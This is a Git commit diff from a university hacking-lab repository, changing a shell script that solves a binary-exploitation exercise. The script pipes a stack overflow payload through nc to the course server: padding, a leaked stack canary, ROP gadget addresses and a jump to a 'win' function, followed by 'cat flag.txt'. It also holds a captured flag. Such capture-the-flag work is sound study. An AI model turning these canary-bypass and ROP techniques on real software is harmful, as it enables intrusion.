ejung/hacklab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

howto execute

Browse Source
This commit is contained in:
Eggert Jung
2026-01-06 15:57:31 +01:00
parent 4c3e281ef5
commit a4dc06d7e1
1 changed files with 3 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
4/level6/test.sh
View File

@@ -1,15 +1,11 @@
# : | { ./test.sh | nc binexp.stud12.hacklab.ias.tu-bs.de 4006; } > /dev/fd/0;
#objdump
#00000000004011d6 g F .text 000000000000003a win
OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64
SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00" #kind of irrelevant
GADGET1="\x84\x12\x40\00\00\00\00\00" #ret (for stack alignment)
GADGET2="\x83\x12\x40\00\00\00\00\00" #pop rdi, ret
CMDADDR="\x48\x40\x40\00\00\00\00\00"
CMDCALL="\xd6\x11\x40\00\00\00\00\00"
#STACKPT="\x18\xde\xff\xff\xff\x7f\00\00"
STACKPT="\x02\00\00\00\00\00\00\00"
read
read
@@ -26,7 +22,7 @@ read input
>&2 echo $input
>&2 echo "writing canary + exploit"
printf "\00$PADDING""1234567\00${canary:0:7}$STACKPT$CMDCALL\n"
printf "\00$PADDING""1234567\00${canary:0:7}12345678$CMDCALL\n"
read input
>&2 echo "should be bye: "$input
printf "cat flag.txt\n"